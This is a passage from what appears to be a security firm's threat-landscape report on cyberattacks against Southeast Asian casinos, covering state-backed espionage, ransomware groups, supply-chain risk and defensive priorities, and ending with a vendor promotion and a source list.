Experts note that casinos sometimes prioritize physical security – guards, surveillance, and anti-cheating controls – over timely IT modernization. As one analyst put it: “After seeing all the physical security… one would think the computer controls are just as strong. However, outdated systems, weak policies, and lack of C-suite buy-in create gaps cyber criminals can exploit.”

This risk is especially acute in smaller or state-run casinos in Southeast Asia, where limited budgets or bureaucracy delay upgrades. In such environments, a single legacy weakness can become an entry point for ransomware, data theft, or lateral movement across critical systems.

Third-Party Connections

Casinos have numerous third-party integrations – from payment processors and hotel franchisors to slot machine vendors, IT contractors, and marketing agencies. A breach in any connected third party can open the door to the casino’s core systems. For example, a vendor’s remote support link (such as slot machine remote diagnostics) could be hijacked if not properly secured.

In 2024, Singapore’s Cyber Security Agency highlighted a supply-chain attack where a single IT provider breach impacted multiple hotels at once. A similar event in the casino sector could spread quickly across properties serviced by the same MSP or vendor.

Additionally, many integrated resorts are tied to multinational parent companies (e.g., Las Vegas Sands owns MBS), so an intrusion in one region could cascade across corporate networks. Cloud services used by resorts for HR, finance, or loyalty programs present another exposure point. Misconfigured cloud storage has already caused data leaks in other industries; for casinos, a similar misstep could expose VIP guest data or employee records.

In essence, the IT environment of casinos is unusually complex — a mix of legacy and cutting-edge, IT and OT, public-facing and internal systems — creating a broad attack surface. The biggest risks often stem not from individual software bugs but from architectural weaknesses: flat networks, weak segmentation between casino operations and hotel administration, unmonitored data flows, and misplaced reliance on obscurity (“who would target a slot machine network?”).

The infamous fish-tank hack may be years old, but it remains a cautionary reminder: any connected device can be a foothold if not secured. Casinos also face the unique challenge of being 24/7 businesses — patching and downtime are avoided, leaving exploitable windows open. Adversaries take advantage of this “always on” requirement, often striking during peak hours or exploiting systems that cannot easily be taken offline for updates.

The result is persistently high exposure. As one survey cited in an IAG report found, 73% of Australian businesses hit by ransomware paid within 48 hours, underscoring that resilience and prevention are still playing catch-up in high-pressure sectors like gaming.

Geographic and Geopolitical Patterns

The cyber threat landscape facing Southeast Asian casinos reveals distinct geographic and geopolitical dynamics:

China’s Shadow

Chinese state-affiliated hacking grooms looms large in the region. After Beijing’s clamped down on Macau, high-roller activity and gaming operations spilled over into Southeast Asia – notably the Philippines, Cambodia, Laos, and to some extent Singapore. In response, Chinese cyber-espionage operations ramped up against those countries’ gambling sectors.

Campaigns such as ChattyGoblin (targeting a Philippine casino) and broader surveillance efforts align with China’s intention to monitor capital outflows, transnational crime, and persons of interest (including corrupt officials or criminal syndicates) involved in offshore gambling. SentinelOne observed that following Macau’s decline, it was “not surprising to see Chinese APT groups target the sector” afterwards. Researchers have noted tool-sharing between Chinese groups, and some operations have stolen digital certificates, such as those from a Singapore-based VPN company (Ivacy VPN’s parent firm), to facilitate attacks

This shift is not only about surveillance but also about protecting economic influence: with billions once flowing through Macau now moving offshore, Beijing views these casinos as both a financial risk and a political lever. By targeting the digital infrastructure of casinos in Southeast Asia, Chinese actors can monitor capital outflows and gain leverage over governments hosting this activity.

Geopolitically, this aligns with Beijing’s aims of cracking down on what it views as illegal gambling affecting its citizens and of gaining leverage (information) over Southeast Asian counterparts. Chinese APTs have also shown coordination: in Operation Crimson Palace, three different Chinese groups simultaneously targeted a Southeast Asian government, likely under one central tasking. Similarly, against casinos, one group might perform an initial compromise (watering hole or supply chain) and pass access to another focused on data extraction.

North Korea’s Financial Reach

North Korea’s cyber operations are global in scale, but Southeast Asia stands out in two keyways: as a target and as a laundering hub. The Lazarus Group has been linked to attacks on online casinos, including Australia-based Stake-as well as fintech and crypto firms in Singapore and Malaysia.

A Reuters investigation revealed that “North Korean hackers are sharing money-laundering networks with fraudsters and drug traffickers in Southeast Asia” highlighting the region’s role in cashing out illicit gains. Stolen casino funds and gambling proceeds have reportedly been laundered through shell companies in Southeast Asia or via Chinese-run casinos in the Golden Triangle.

What makes casinos particularly useful in this ecosystem is their integration into regional underground financial channels. Junket operators, informal remittance systems, and opaque VIP programs create an environment where illicit funds can be mixed with legitimate high-roller activity. North Korean groups exploit this both directly — by targeting casinos with intrusions — and indirectly, by laundering proceeds through associated networks.

While not a direct cyber-attack pattern, this infrastructure support implies that North Korean hackers have interest in penetrating financial nodes in SEA. If a land-based casino’s VIP program has links to cryptocurrency wallets or if its junket operators deal in crypto, those could become NK targets. Similarly, South Korean or Japanese-owned casinos in SEA (for example, Japanese investments in Philippines IRs) may attract North Korean espionage aimed at tracking those nations’ strategic or commercial interests.

Regional Cybercrime Syndicates

Southeast Asia unfortunately hosts some of the largest cyber-fraud rings (like those running online scams from Cambodia, Myanmar casinos, or Philippine POGOs – Philippine Offshore Gaming Operators). These criminal groups could potentially turn their attention inward to local casinos.

For instance, the UNODC report on cybercrime in SE Asia noted the rise of service-based models and collaboration among Asian crime groups, sometimes using casino businesses as fronts. There’s evidence that some rogue IT personnel from online gambling outfits have insider knowledge that could aid in hacking rival casinos or their own employers. While major ransomware and APT attacks have been linked to external actors, one cannot rule out that insiders or local gangs might exploit a casino’s vulnerabilities if it serves their interests (such as rigging jackpots, or stealing VIP data to kidnap a high-roller – a very real physical threat in some countries).

Global Ransomware Franchise Hits Asia

Many of the ransomware groups like BlackCat, Clop, and LockBit originate from Eastern Europe and Russia, or operate through affiliates worldwide. Their campaigns have no borders – they pursue large, vulnerable targets whenever they can. However, language and time zone preferences can shape targeting behaviour. For instance, the ALPHV/Scattered Spider attacks shown a preference for English-speaking environments (they socially engineered an English-speaking helpdesk), but ALPHV’s success at a major Philippine resort shows they are willing to target non-English organisations too, possibly via affiliates familiar with the local language.

There is also a trend of copycat activity: when one group finds success in a specific industry, others follow. After MGM and  Caesars’ incidents in the U.S., other ransomware crews may have proactively scanned or phished casinos in Asia, anticipating that defences might be comparatively weaker. In 2024, LockBit reportedly claimed attacks on hotels in India and Thailand, indicating a growing APAC footprint.

 Some ransomware groups have also used symbolic attacks to make a statement. In 2022, pro-Russian hacktivists launched a DDoS attack against Japan’s casino commission website not for monetary gain, but to protest Japan’s stance on Russia. This shows how geopolitical tensions can occasionally spill over into the casino sector, making it a target even when the motivation isn’t financial.

ASEAN Cooperation and Response Differences

Southeast Asia is not monolithic region when it comes to cybersecurity maturity.  Singapore leads with advanced defenses and strict breach disclosure laws. Malaysia and Thailand are steadily improving their cybersecurity posture, while countries like Cambodia and Laos have more nascent capabilities.

Threat actors often calibrate attacks based on this uneven playing field. For example, a Chinese APT may be more aggressive in a country with weaker cyber laws or minimal enforcement —there have been persistent rumours of multiple unreported breaches in Cambodian casinos, especially in Sihanoukville. In contrast, the same actor might behave more cautious in Singapore, where collaboration between law enforcement and international partners is stronger and where regulatory scrutiny is high.

Cultural context also plays a role. Some Asian companies prefer to “save face” by quietly resolving incidents rather than disclosing them publicly, which limits visibility into the true scale of cyberattacks in the region. This reluctance to report is something ransomware actors exploit, pressuring victims to pay quietly rather than seek help.

As noted in an IAG article, the ongoing wave of attacks “seems to suggest a concerted effort by one or more groups to target gaming companies around the world”, Mapping out regional incidents reveals potential clusters around late 2023, and possibly again in late 2024, hinting at cyclical targeting, perhaps timed around major events or financial reporting cycles when distribution would be damaging.

Beyond China and North Korea: A Wider Geopolitical Lens

Casinos occupy a unique intersection of finance, tourism, and–at times–organised crime, making them attractive targets for a range of nation-state actors. While Chinese and North Korea cyber activity dominates the current landscape in Southeast Asia, other state-backed threat groups have also shown interest in adjacent industries. For example, Iranian and Russian APTs have targeted hospitality providers in the past to conduct surveillance on diplomats and political figures.

It’s not far-fetched to imagine scenarios casinos could become high-value espionage targets-such as during an internally summit hosted at Singapore’s Marina Bay Sands or Indonesia’s Bali Nusa Dua complex. In such context,  APTs might exploit hotel networks, Wi-Fi infrastructure, or guest reservation systems to extract intelligence. This underscores how quickly a typically financially motivated  target  can become politically strategic.

In summary, Chinese state hackers dominate the state-sponsored threat picture in Southeast Asian gambling (with dual motives of intelligence and economic gain), while Eastern European/Russian-speaking cybercriminal gangs dominate the financial crime picture (ransomware, data theft). North Korea remains a wild card primarily focused on financial hacking.

The region’s vulnerabilities—both technical and procedural—have attracted these global actors who perceive casinos as lucrative, data-rich, and cash-rich environments. As long as casinos continue to generate billions in revenue and hold valuable personal data, and as long as some operate in jurisdictions with less mature cyber oversight, these geographic patterns of targeting are likely to persist or even intensify.

Conclusion: Casinos in the Crosshairs

From stealthy espionage campaigns to brazen ransomware extortions, the period 2023–2025 has shown that Southeast Asia’s casinos and integrated resorts are firmly in the crosshairs of cyber threat actors. Public breaches at Marina Bay Sands, a major Philippine resort, and others are likely just the tip of the iceberg. Attackers – whether nation-state APTs leveraging custom malware (e.g., DiceyF’s GamePlayerFramework) or cybercriminal cartels wielding ransomware (BlackCat, Clop) – have demonstrated the means to infiltrate these complex enterprises, often by exploiting the very traits that make casinos unique: large networks of interlinked systems, vast amounts of sensitive data, and the imperative to keep services uninterrupted 24/7.

The tactics observed reveal that many intrusions were not always sophisticated zero-day exploits, but opportunistic abuses of weak links—human or technological. Yet once inside, attackers often displayed persistence, coordination, and a deep understanding of casino operations. The fallout has been significant: multi-million dollar financial losses, hundreds of thousands of customer records compromised, and operational downtime that directly impacts revenue and reputation. The ripple effects also extend to the wider gaming supply chain, as seen in breaches of vendors like IGT and Aristocrat, which indirectly impact casino operations across the region.

The real turning point of 2023–2025 is the convergence of tactics: state-sponsored groups sometimes deploying ransomware as smokescreens, while cybercriminal gangs adopt APT-like tradecraft. Meanwhile, geopolitical shifts and uneven regulation across ASEAN have created a patchwork of defenses that sophisticated adversaries exploit.

But this is not a lost game. Most of these breaches were preventable—or at least containable—if better visibility, preparedness, and response mechanisms were in place.

As one industry cybersecurity expert aptly warned:

“Attackers have discovered that casino companies are not always the impenetrable fortresses we see in the movies.”

Key Takeaways: What Casino Security Leaders Must Prioritize
    1. Prioritize Identity and Access Hardening


      The most common entry points remain compromised credentials, VPN abuse, and helpdesk impersonation. Implement phishing-resistant MFA, harden RDP access, and conduct regular credential audits.

    1. Patch Web Applications and Monitor Third-Party Software


      Exploited systems in this sector have included public-facing apps, vendor software (e.g., MOVEit, IGT, Aristocrat), and overlooked CMS vulnerabilities. Maintain tight patch hygiene, especially for externally accessible systems.

    1. Build Detection Around Attacker Behaviors, Not Just Alerts


      Deploy detection rules for TTPs seen in real casino incidents: DCSync, LOLBins, use of remote management tools, illicit VPN installs, and lateral movement to backup servers.

    1. Invest in Response Readiness


      Run realistic tabletop exercises tailored to casino environments. Have service-level agreements with external incident responders in place before a breach.

    1. Secure the Supply Chain


      Casinos rely on complex vendor ecosystems—ensure third-party security assessments and breach notification protocols are part of procurement contracts.
    1. Don’t Just React—Plan Strategically


      Modern threat actors exploit systemic gaps. It’s time to go beyond tools and dashboards. Invest in outcome-based security services that close the gap between detection and action.
THEOS Cyber: Your Partner in Resilience

THEOS Cyber works with top-tier casino and online gaming operators across the region, providing elite cyber defence services tailored to high-risk, high-value environments like yours. Whether it’s proactive red teaming, VAPT, strategic incident readiness planning, or real-time DFIR and SOC response, we help gaming enterprises close the gap between threat and action—before attackers cash in.

Cyber threats in the casino sector aren’t theoretical anymore. They’re here, evolving, and often one step ahead. Let’s change that.

Sources

Recent threat intelligence and incident reporting from Inside Asian Gaming, BleepingComputer, The Record, RH-ISAC, TRM Labs, and vendor threat landscape reports (CrowdStrike, ENISA, Unit 42), among others. These illustrate and corroborate the trends discussed above, reflecting a diverse and evolving threat landscape for the casino industry in Southeast Asia. Each citation corresponds to specific details in the analysis for verification and further reference.

CrowdStrike 2024 Global Threat Report (February 2024)

CrowdStrike Intelligence Weekly Report – Week of 20 January 2024

CrowdStrike Intelligence Weekly Report – Week of 6 April 2024

CrowdStrike Intelligence Weekly Report – Week of 29 June 2024

Sophos – Sophos State of Ransomware 2025 (2025)
https://www.sophos.com/en-us/content/state-of-ransomware

Sophos – Operation Crimson Palace, Chinese State-Sponsored Espionage, Expands in Southeast Asia, Sophos Report Finds (September 2024)
https://www.sophos.com/en-us/press/press-releases/2024/09/operation-crimson-palace-chinese-state-sponsored-espionage-expands-0

The Hacker News – Operation ChattyGoblin: Hackers Targeting Gambling Firms via Chat Apps (May 2023)
https://thehackernews.com/2023/05/operation-chattygoblin-hackers.html

ESET – ESET APT Activity Report Q4 2022–Q1 2023 (May 2023)
https://www.welivesecurity.com/2023/05/09/eset-apt-activity-report-q42022-q12023/

Bleeping Computer – Hackers target Asian casinos in lengthy cyberespionage campaign (October 2022)
https://www.bleepingcomputer.com/news/security/hackers-target-asian-casinos-in-lengthy-cyberespionage-campaign/

Trend Micro – Operation Earth Berberoka (May 2022)
https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf

SC Media – Over $41M stolen from Stake.com in cryptocurrency heist (September 2023)
https://www.scworld.com/brief/over-41m-stolen-from-stake-com-in-cryptocurrency-heist

MITRE ATT&CK – APT38 (January 2025 version)
https://attack.mitre.org/groups/G0082/

FBI – FBI Identifies Lazarus Group Cyber Actors as Responsible for Theft of $41 Million from Stake.com (September 2023)
 (https://www.fbi.gov/news/press-releases/fbi-identifies-lazarus-group-cyber-actors-as-responsible-for-theft-of-41-million-from-stakecom

Tech Target: Caesars Entertainment breached in social engineering attack (September 2023)
https://www.techtarget.com/searchsecurity/news/366552134/Caesars-Entertainment-breached-in-social-engineering-attack

Ars Technica – A phone call to helpdesk was likely all it took to hack MGM (September 2024)
https://arstechnica.com/security/2023/09/a-phone-call-to-helpdesk-was-likely-all-it-took-to-hack-mgm/

SANS – Defending Against SCATTERED SPIDER and The Com with Cybercrime Intelligence (July 2024)
https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence

CISA – #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability (June 2023)
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a

Trend Micro – Ransomware Spotlight – Clop (February 2022)
https://www.trendmicro.com/vinfo/ph/security/news/ransomware-spotlight/ransomware-spotlight-clop

Trellix – Inside the LockBit’s Admin Panel Leak: Affiliates, Victims and Millions in Crypto (June 2025)
https://www.trellix.com/blogs/research/inside-the-lockbits-admin-panel-leak-affiliates-victims-and-millions-in-crypto/

Reuters – MGM Resorts breached by ‘Scattered Spider’ hackers: sources (September 2023)
https://www.reuters.com/technology/moodys-says-breach-mgm-is-credit-negative-disruption-lingers-2023-09-13/

U.S. Securities and Exchange Commission. “XBRL Viewer.” SEC.gov, 2023 (September 2023)
https://www.sec.gov/ix?doc=/Archives/edgar/data/0001590895/000119312523235015/d537840d8k.htm

Palo Alto Networks Unit 42 Incident Response Report (February 2024)
https://unit42.paloaltonetworks.com/unit42-incident-response-report-2024-threat-guide/

ENISA Threat Landscape 2024 (May 2024)
https://securitydelta.nl/media/com_hsd/report/690/document/ENISA-Threat-Landscape-2024.pdf

Fortinet Global Threat Landscape Report 2025 (August 2025)
https://www.fortinet.com/resources/reports/threat-landscape-report

Cisco Talos Year in Review (March 2025)
https://blog.talosintelligence.com/2024yearinreview/

The Record – Gambling and lottery giant disrupted by cyberattack, working to bring systems back online (November 2024)
https://therecord.media/gambling-lottery-giant-hit-with-disruptive-cyberattack

Center for Strategic and International Studies – Cutting Losses: Southeast Asia’s Crackdown on Online Gambling (July 2025)
https://www.csis.org/blogs/new-perspectives-asia/cutting-losses-southeast-asias-crackdown-online-gambling

Kaspersky Securelist – DiceyF and GamePlayerFramework analysis (October 2022)
https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/

SentinelOne Labs – DLL Hijacking in Asian Gambling Sector (August 2023)
https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/

The Record – Singapore’s Marina Bay Sands says 665,000 customers had data stolen during cyberattack (November 2023)
https://therecord.media/singapore-marina-bay-customers-data-cyberattack

United Nations Office on Drugs and Crime (UNODC) – North Korean money laundering through SEA casinos (January 2024)
https://www.unodc.org/roseap/uploads/documents/Publications/2024/Casino_Underground_Banking_Report_2024.pdf

Reuters – North Korean hackers, criminals share money laundering networks in Southeast Asia – UN (January 15, 2024)
https://www.reuters.com/world/asia-pacific/north-korean-hackers-criminals-share-money-laundering-networks-southeast-asia-un-2024-01-15/

United Nations Office on Drugs and Crime (UNODC) (September 2023)  – Casinos, cyber fraud, and trafficking in persons for forced criminality in Southeast Asia
https://www.unodc.org/roseap/uploads/documents/Publications/2023/TiP_for_FC_Policy_Report.pdf

SC World – Mounting pro-Russian DDoS attacks launched against Japan (December 2024)
https://www.scworld.com/brief/mounting-pro-russian-ddos-attacks-launched-against-japan

United Nations Office on Drugs and Crime (UNODC- Transnational Organized Crime and the Convergence of Cyber-Enabled Fraud, Underground Banking and Technological Innovation in Southeast Asia: A Shifting Threat Landscape (October 2024)
https://www.unodc.org/roseap/uploads/documents/Publications/2024/TOC_Convergence_Report_2024.pdf